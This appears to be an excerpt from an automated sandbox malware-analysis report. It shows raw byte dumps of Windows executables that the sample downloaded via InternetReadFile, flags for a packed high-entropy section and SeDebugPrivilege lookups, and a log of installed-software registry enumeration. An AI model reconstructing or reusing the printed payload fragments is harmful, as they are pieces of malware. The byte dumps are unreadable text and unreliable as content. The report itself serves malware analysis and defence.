.rsrc$02ÿUì3ÀÒtúÿÿÿv¸WÀxQÿuQèÛëÒtÆ]ÂÿUìSVW3ÿ»W÷Òtúÿÿÿvóöx?òÁÒt8t@îuõþÂ÷Þö+Çæ©ÿøó÷ßÿ#øöxQÿu+×QÏènð_Æ^[]ÂÿUìEV3öÀt=ÿÿÿv¾Wöx5S]3öWxÿEPÿuWSÿ\|¢@ÄÀx;Çwuë¾zÆ_[ë ÀtMÆÆ^]ÃÿUìÒt&ESV¾þÿÿ+ÁötÛt ANêuì^[ÒuI÷ÚÆÒâÿøz]ÂÿUì9MrEº+Á;Âw+M ë3À]ÂÿUìì¡@3ÅEüSVW3ÀfÇEøñEôhD@uèØÿx @øÿtjhT@Wÿ @EðÀtP3ÉEìPQQQQQQh j jEôPCÿ$ @ÀtMðôÿuèÿuìjÿ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @MüÃ_^3Í[èATå]ÃÿUìì¡@3ÅEü¡(@SWj3ÛfÇEø_]ô]ð;ÇôMðèÿÿÿÀÓEèPjÿ¡@Pÿ @ÀÉEìPSSWÿuèÿ @Àÿl @øzVÿuìSÿP¡@ðötqEìPÿuìVWÿuèÿ @ÀtTEäPSSSSSSh j WEôPÿ$ @Àt49v'~ÿuäÿ7ÿ, @Àu CÇ;réë3À@£(@Eðÿuäÿ @Vÿ¤ @^ÿuèÿ @EðëEðÀt Ç(@Mü_3Í[èSå]ÃÌÌÌÌÌÌÌÿUìì¡@3ÅEüEVu-t!èuUÃ÷ÿÿùw RVÿà¡@ëP3ÀëOÿÌ¡@ÐÎè)hüýÿÿÆüýÿÿPÿuÿ5<@ÿè¡@üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@Mü3Í^èbRå]ÂÿUìQSÁÚVWEü3ÿ0ë>tFf¾ËèÔKÀuëEüf¾0ë3Àë#<7tGf¾7Ëè®KÀté78tÆ@_^[å]ÃÿUìì¡@3ÅEüEºSVÙèùÿÿEôýÿÿWSìùÿÿè[ûÿÿ½ôýÿÿ"u ºl@õýÿÿëºp@ôýÿÿðùÿÿðùÿÿè-ÿÿÿµðùÿÿøöt<ÎQAÀuù+Êùr)F<:u~\t >\u<\uVºøþÿÿèãúÿÿë(Qhä@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.ZÎè÷JÀjÿht@jÿPjjÿh @Hè\|øþÿÿPÿ request_handle: 0x00cc000c	1	1
InternetReadFile July 27, 2023, 10:25 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $DØþe¹6¹6¹6Ò7¹6Ò7¹6Ò7¹6Ò7¹6¹6 ¹6Ò7 ¹6Òo6¹6Ò7¹6Rich¹6PEdøÄ®ð"\|@ àéæ`Á <¢´ð$ÖàÐ T( .text{\| `.rdataÈ"$@@.dataÀ¤@À.pdataà¨@@.rsrcàðØ®@@.reloc Ð@BÌÌÌÌÌÌÌÌE3ÉHBÿAºþÿÿA»WI;ÂEGËEÉxGHÒt"L+ÒL+ÁIHÀtAÀtHÿÁHêuäHÒHAÿHEÁH÷ÚEÉA÷ÑAázÆëHÒtÆAÁÃÌÌÌÌÌÌÌÌÌÌE3ÉLÒMØHÑA¸WIBÿH=þÿÿEGÈEÉx5IÊHÂMÒt8t HÿÀHéuòHÁH÷ØEÉA÷ÑE#ÈHÉtMÂL+ÁëE3ÀEÉxXIÊII+Èt.HÁMþÿÿI+ÂLÈL+ÚMÉtAÀtIÿÉHÿÂHéuåHÉHBÿHEÂH÷ÙEÉA÷ÑAázÆAÁÃÌÌÌÌÌÌÌÌÌÌLD$LL$ SVWHì 3ÿHBÿH=þÿÿHñ¹WGùÿx;HZÿHÎHÓLL$X3ÿHÿDÀxHH;Ãwu@<3ë@<3¿zëHÒtÆÇHÄ _^[ÃÌÌÌÌÌÌÌH\$Hl$VWAVHìH ®H3ÄHD$pLñfÇD$l3íH ýl$hHÿDHØHÀHðHÈHÿ.DHðHÀtmHD$`A.HD$PDE l$HHL$hl$@}l$8A¹ l$0²l$(l$ Hÿñ~DÀt$HT$`MÆ3ÉHÆÿµHL$`Hÿ¡~DHËHÿÊDÇHL$pH3Ìè¦qL$I[(Ik0IãA^_^ÃÌÌÌÌÌÌÌÌÌÌHÄHXHpHxLp UHh¡HìHö¬H3ÄHEG-®E3öDu?fÇECDu'A^;ÃHM'èþÿÿÀhHÿDHÈLE/SHÿæ}DÀWHM/HE+E3ÉHD$ E3ÀÓHÿ}DÀHÿY~DøzëU+3ÉHÿDHøHÀÎDM+HE+HM/LÇÓHD$ Hÿ9}DÀHE7A¹ HD$PHM?Dt$HA¸ Dt$@ÓDt$8Dt$0Dt$(Dt$ Hÿ4}DÀtLAöD97v4»HU7ÎHÉHLÏHÿ}DÀuó;7rÜë Î¬]'HM7Hÿ¼\|DHÏHÿÕ}DHM/Hÿ}DE'ë ¬»E'ÀEË ~¬HMGH3ÌèoL$I[IsI{ Ms(Iã]ÃÌÌÌÌÌÌÌÌÌH\$WHì0HôªH3ÄH$ IùIÀHÙêt'úuIÀÃ÷ÿÿIøwHÐHÿôDëh3ÀëiHÿ DHÐHËèú6H ûÈLD$ A¹ÆD$ ×Hÿ¢DLD$ º?HËHÿ±DÉÿHÿD¸H$ H3Ìè nH$HHÄ0_ÃÌÌÌÌÌÌÌH\$Hl$Ht$WHì HHòHù3íë@8+tjHÿÃ¾HÎèÌfHÀuè¾HÎHè¹fHÀuHû?tHÿÇHÎÿÅ¾èfHÀtæHcÅHÃ8tÆHÿÀH\$0Hl$8Ht$@HÄ _ÃÌ3ÀëæÌÌÌÌÌÌÌÌH\$UVWATAUAVAWH¬$úÿÿHìpH^©H3ÄH`LñHEPMÖHMPL+ÐMùE3íMàºHúþÿHÀtA ÀtHÿÁHêuáHÒHAÿHEÁD(}P"u H#HEQëHHEPHL$0HD$0è»þÿÿH\|$0HËÿHðHÿtlHÃHÿÀD8,u÷HørZG±\<:u8Ot8uH:ÁuDHD$@LÇL+ÀHL$@ºHúþÿHÀtAÀtHÿÁHêuáHÒHAÿHEÁD(ëZA¹LY¾HD$@AÑL+ÀHL$@HúþÿHÀtAÀtHÿÁHêuáHÒHAÿLÇAÑHEÁHL$@D(è¤cº.HÏèWeHÀH \$(ºHL$ DËLÀJ~Hÿ¹yDøÎHL$@Hÿ¯yDøÿÁè÷Ðà~HÄ~Ht$0HL$0è]ýÿÿHÈHÀt"D8)H§~HD$0HEÁHL$0HD$0è3ýÿÿº¹@Hÿ{DHØHÀËHt$0H=E¨HÏLL$@HV~D8.HEÎE3ÀHÿyDLËAÇ(¼Lá}HD$@HD$(H ~H )~ÇD$ HÿZyDÀt5 ÅºD8.IÎHEþLÇèöÿÿLD$@ºHËèöÿÿéM%ÙÄûfD9-åÄu%A¸HT$@HL$@L5¼}HÿEzDëL5·}D8.HD$@HD$(L§HEþMÎºH\|$ HËè^÷ÿÿéÞE3ÉLD$@º%Dl$(3ÉÇD$ è¸33Àé¿º.HÏè@cHÀHP}\$(HT$ DËºLÀJ~Hÿ¢wDøukH5Ñ¦HÃHÿÀD8,u÷HL$@HÿÃD8,u÷H<¹@HWHÿ3yDHØHÀuE3ÉºµE3ÀéNÿÿÿLL$@LÆHWHÈèöÿÿé¿¹@×HÿêxDHØHÀt·HL$@HÿwDøÿt}¨uyLD$@×H`L+ÀH`HþûÿHÀtBÀtHÿÁHêuáHÒHAÿHEÁD(HötmD8.thLÙ{H×H`èõÿÿLÆH`H×èõÿÿë>H`L+ðH`HþûÿHÀtB2ÀtHÿÂHïuáHÿHJÿHEÊD)LÃD+HÓH`èI$¸H`H3ÌèhH$¸HÄpA_A^A]A\ request_handle: 0x00cc000c	1	1
InternetReadFile July 27, 2023, 10:25 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ù=LF¸SF¸SF¸Sò$¢K¸Sò$ Ë¸Sò$¡^¸SÆÃ®D¸SÆÃWU¸SÆÃPQ¸SÆÃVt¸SOÀÐM¸SOÀÀA¸SF¸RN¹SÈÃV`¸SÈÃSG¸SÈÃ¬G¸SÈÃQG¸SRichF¸SPELf¡¹dà!~à]@À@Á04dP°øßT)@T8³@,\ .text}~ `.rdataæ¦¨@@.data \@@À.didatx :@À.rsrcøß°à<@@.relocT)@BhOCè%ÃÌÌÌÌÌh Bè¯IYÃÌÌÌÌèèZ£8àCÃÌÌÌÌÌ¹HàCéUiÌÌÌÌÌÌ¹PåCèbßh°BèuIYÃÌÌÌÌÌÌÌÌÌÌ¹øaFèéFhÀBèUIYÃÌÌÌÌÌÌÌÌÌÌ¹EéÑÌÌÌÌÌÌ¹°Eè¡)hÐBè%IYÃÌÌÌÌÌÌÌÌÌÌ¹EèFhàBèIYÃÌÌÌÌÌÌÌÌÌÌ¹®EèhðBèåHYÃÌÌÌÌÌÌÌÌÌÌhBèÏHYÃÌÌÌÌUìì,EüVPÿ\| FÀu`E3ÉEÜÔýÿÿEäEEèEÜPMàÇEìAMðMôÿl Fðöt)SÿuVÿp FMüÀVQÃrÎÿ,BÿÖÃ[ë2À^ÉÂÌÂ¶D$Pÿt$ÿt$ÿL¡FPÿH¡FÂ¶D$÷ØÀà Pÿt$ÿt$ÿL¡FPÿX¡FÂUì}0tY}u]E ¹°E$¶ÀPÿuÿuè6öE t>ÿuÿ@¡FÀt1h!0PÿL¡FÀt!öE thBPÿD¡Fë ÿu¹°Eè62À]ÂUìE=rEPEPè`EPÿuèøCYY]Â¸Bè÷CQVñWuðè§²èW3ÿ`²}üèøV¼²ÆEüèéV³ÆEüèÚVt³ÆEüèËVÐ³ÆEüè~D¾à³¾ä³¾è³ÎÆEüèMôÆ_^d ÉÃ9tÿ1èkYÃéÅéèÿÿÿÁ³éW¸ èaCSUVWjjÿ´$( è{$ Øè·W½é¢D$Pè%ð·Qè_$¼$ tÀt3ÀfëÀtUhBD$PèUjjD$ûPèðf>*u:·NQè$Àt,j.Xj\f$XUf$$SPèxU¼$ÿ´$( WVèÀu'$ D$UPè¡VÀDÿÿÿ_^][Ä Â°ëïUìVjÿuñÿuÿu`²PèàþÿÿÀt°ë,}t$¾Ð²tjÿu¼²ÿuÿuPè²þÿÿÀtÒ2À^]ÂVñèõ3À²fâf¢fØÜàè>V`²è3V¼²è(V³èVt³èVÐ³è¿Cà³;ä³tä³^ÃQQSUVt$(Wùöt\|$0v3ÀfL$3ÛCSjéi(D$Ïÿt$l$ UèäþÿÿÀu4Ç²Ï\|$è¯UÏëÿt$$UWèÀuL$CèìTøÿuá3À_^][YYÂl$ ítÿt$WèS÷ØÀþÀEötÿt$0WVè«SÃëÉD$L$#Pü+ÂÀüøwÂèPÌVñ>tF+àøPÿ6èIüÿÿ3ÀFF^ÃT$Vt$W\|$öt¶¶Â3ÈÁê3OCGîuè_Â^ÂVt$3À9Fu(WjÈ_ÑÑêöÁÊtñ ¸íïuê@=rÚ_^ÂUììLM´ÿuèøM´èQ]ÉÂUììLM´ÿuèÛÿuE´PèaM´è(]ÉÂUììLM´ÿuè²ÿuE´ÿuPèPM´èü\ÉÂUììLM´ÿuèÿuE´PèLM´èÓ\ÉÂL$Q@úsD$ÿA@ÂL$Q@úsD$ÿA@ÿt$QèÃÿÿÿÂL$Q@ús D$ÿA@Â3ÀÇAAfAÁÃVWñ¸BjYþó«j 3ÿF WPèÒND$Ä~@~DFHÆ_^ÂVD$ñPjèÐþÿÿjÎèä^ÂjèÙD$ÆÂVñ~ uè ÿt$ÿt$è$_ÀuÆF ë2À^ÂVñ~uD$Pj èrþÿÿÎèÐjÎè^ÂVD$ñPD$Pj èsþÿÿÎè¨j ÎèW^Âé#UììEPjÿuøÿÿhPèÄøÿÿPjèRþÿÿMèZÉÃÿBÀt$jÿt$ÿt$hPjhÿBÀÀë2ÀÂVñèjÎè¡^ÃVjñèýÿÿjÎè·^ÃVD$ñPD$PjèýÿÿÎèâjÎèètX^Âÿt$jèÈÿÿÿÂVÿt$ñjè jÎè8^ÂVD$ñPD$PjèWýÿÿÎèjÎè;^Âÿt$jèÍÿÿÿÂVñ~uD$Pjè÷üÿÿÎèUjÎèÙ^ÂT$Âètèt&èt-üu9uÿAÂ9tõÇëí9t9uãÇëÛìD$hPèþÿÿÀtmSUVj [j t$]t$W·f;Ãtf;ÅuÆëît$fÀt<SVè:QøYYÿuUVè+QøYYÿt3ÀfÇD$Pjè#üÿÿ÷t$ÿu©_^][ÄÃUìQVuþÿuyu^ÉÂVè ÿÿÿh¤CEüuüPèxQÌD$PD$Pj!èóûÿÿj¹EèÛþÿÿÂVÿt$ñÿt$è jÎèÿÿÿ^ÂVD$ñPD$Pj è³ûÿÿÎèèþÿÿjÎèþÿÿ^Â¸oCÃUìÿuÿuÿuÿuÿuèãÿÿÿÿpÿ0èªÄÀyÈÿ]ÃIÿ3ÀfA2AAfA4A0fA$AA(A,ÁÇBfÇAÆAÇA Ã3À $ÁÃUìd¡jÿh£BPd%yÿÇBtyuytè{ëèFMôd ÉÃÌÌÌÌÌÌÌÌÌÌ request_handle: 0x00cc000c	1	1
InternetReadFile July 27, 2023, 10:25 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyáå~Lyáâ~Ryáä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPELÅl¾dà!Þ>ð°@ J<K<øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD`D@À.rsrcøP@@.relocTR@Bj h¨<¹phè?#hêèYÃÌÌÌj8hÌ<¹hè#h`êèlYÃÌÌÌj8hÌ<¹ hèÿ"hÀêèLYÃÌÌÌj8hÌ<¹¸hèß"h ëè,YÃÌÌÌj8h=¹Ðhè¿"hëè*YÃÌÌÌj0hD=¹èhè"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌhh°=¹iè\"h ìè©)YÃj?h>¹0iè?"híè)YÃÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPèÂ2ÄÆ^]ÂÌÌÌI¸\|<ÉEÁÃÌÌUìVñFÇñPèó2ÄöEtjVè«%ÄÆ^]ÂAÇñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿhJEôPè2ÌÌÌÌUìVñWÀFPÇñfÖEÀPèò1ÄÇìñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPè²1ÄÇ ñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìQSZVWQSñè=h3É3À}üÛ~53Ò;ÇþEÐ=h¸phCph~r>A}üB;Ë\|Ë~r_ÆÆ^[å]Ã_ÆÆ^[å]ÃÌÌÌÌÌUììSVWòùQ}ôFPEðè3Û]ø9]ð)D~Ær¾Pè¯KÄÀu-NÆùr< tÆùrÏréÌ~Ær=@i3Ò Diÿt+EÿfD]ÿù¸0iC0i8]øtB;×ráÊÿEÈxr3Àÿt.MÿD=Di¹0i]ÿC 0i8]øt@;ÇrÝÈÿ=Di¹0iC 0iMìMôMøyr MøÏ+È 3Ò÷÷Mì}ô MøC]ø;]ðÜþÿÿrÆÇ_^[å]ÃÆÇ_^[å]ÃÌÌÌÌÌÌÌÌÌÌUìì@SVWÙòQMÄ]ôèçýÿÿEÄÖPMÜèYþÿÿhÇCÇCÆè°"Ø¹Èÿ]øûÄó«3Ò¾8>Bú@\|ðUì3ö3Û~øÒtAMø}ðEÜCEÜ¾øÿt'ÁæðÇxÏÆÓøMôPèUìïMøC;ÚrÂEøÀthPèð!ÄUðúr(MÜBÁúrIüÂ#+ÁÀüøwVRQèÀ!ÄUØÇEìÇEðÆEÜúr(MÄBÁúrIüÂ#+ÁÀüøwRQè~!ÄEô_^[å]ÃèGÌÌÌÌÌÌÌÌÌÌÌUìì4E0SVW3ÿÆEè¾À]ÇEàÇEäÆEÐ;Ç´+ÇMÐ;ÃBØ}4E CE SÇPèþr.MèVÁúrIüÂ#+ÁÀüøhRQè× ÄMÐ}Uó~EàEèCU}äuà]f~ÉMèCÁfÖEø;óu\îr; uÀÂîsïþüî: u7þýßH:Ju&þþÎH:Juþÿ½@:B±E0Guü;øõþÿÿ3ÿUþr/MèFÁþrIüÆ#+ÁÀüøVQè UÄEør'HÂùrRüÁ#+ÂÀüøw`QRèÏÄU4ÇEÇEÆEúr3M BÁúrIüÂ#+ÁÀüøwë uüGéWÿÿÿRQèÄÇ_^[å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌUìQS]Vñ]üWjhÀ>ÇFÇFÆèD3ÿÛ~1}ECE8S¿C ú¶È¶ÃGÈ¶ÁÎPèG;}ü\|ÏUúr(MBÁúrIüÂ#+ÁÀüøwRQèÑÄ_Æ^[å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì0VWj$hÄ>MÐÇEàÇEäÆEÐèEÀu3öéÇ3ÿÀ¸ÇEøÇEüÆEè;ÇF+Ç¹;ÁBÈ}ECEQÇMèPèBìEÐÌPètìEèôìÌPèaÎèªþÿÿÄè¢üÿÿUüÄ0Àúr,MèBÁúrIüÂ#+ÁÀüø¹RQèÇÄEG;øHÿÿÿ¾Uäúr(MÐBÁúrIüÂ#+ÁÀüøwxRQèÄUúr^MBÁúrFIüÂ#+ÁÀüøwHë4úr(MèBÁúrIüÂ#+ÁÀüøw#RQè1Ä3öétÿÿÿRQè Ä_Æ^å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌUìQEUMVÀS@WPè] ÄM}ØÓCM+ÑID ÿÀuóóNFÀuù+ñFVjÿðVøSWÿðPèÇ5ÄWÿðjÿñÿñWjÿñÿ ñUM_[^úr%BÁúrIüÂ#+ÁÀüøwRQèAÄå]ÃèdBÌÌÌÌUìì$SVWùjÇGÇGÆÿñÀj ÿ$ñØ]üÛlSÿðEôÀSjjjjjÿPjhéýÿððuøö.WN;ÊwOÇrÆëFGÙ+Ú+Â;Øw%ÇOrS4jVèE,ÆÄuøëQSÆEøÏÿuøSè¨]üÇrjjVPjÿÿuô request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00078400', u'virtual_address': u'0x0000c000', u'entropy': 7.874881807840722, u'name': u'.rsrc', u'virtual_size': u'0x00079000'}

entropy

7.87488180784

description

A section with a high entropy has been found

entropy

0.936708860759

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (6 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW July 27, 2023, 10:24 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 27, 2023, 10:25 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 27, 2023, 10:25 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 27, 2023, 10:25 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 27, 2023, 10:25 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 27, 2023, 10:25 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Queries for potentially installed applications (50 out of 153 events)

Time & API	Arguments	Status
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000003a8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: 7-Zip base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: AddressBook base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: Adobe AIR base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: Connection Manager base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: DirectDrawEx base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: EditPlus base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: Fontcore base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: Google Chrome base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: IE40 base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: IE4Data base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: IE5BAKEX base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: IEData base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: MobileOptionPack base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: Office15.PROPLUSR base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: SchedulingAgent base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: WIC base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 27, 2023, 10:25 a.m.	regkey_r: {90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x000003a8 key_handle: 0x000003ac options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
